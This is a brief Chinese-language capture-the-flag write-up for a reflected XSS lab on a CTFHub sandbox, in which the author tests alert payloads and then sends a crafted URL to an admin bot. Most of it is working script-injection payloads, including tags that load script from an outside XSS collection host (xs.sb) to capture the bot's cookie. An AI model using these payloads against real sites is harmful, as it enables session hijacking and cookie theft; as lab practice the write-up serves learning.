查看是否能弹框
<script>alert("xss")</script>
尝试弹出自己的cookie发现是空的
<script>alert(document.cookie)</script>
XSS平台
第一个输入框
<sCRiPt/SrC=//xs.sb/T391>//可以看到图片中下面那个是我们的,没有cookie
第二个输入框复制url输入,他第二个输入框是将url发送给了机器人(相当于管理员,这样我们就获取到了管理员的cookie)//图片上面那个是机器人的cookie中含有flag
http://challenge-6d1eed70035be632.sandbox.ctfhub.com:10080/?name=%3C%2Fh1%3E%3CsCRiPt%2FSrC%3D%2F%2Fxs.sb%2FT391%3E
<img sRC=//xs.sb/T391/xss.jpg>
尝试平台的其他代码,图片的方式没有反弹回来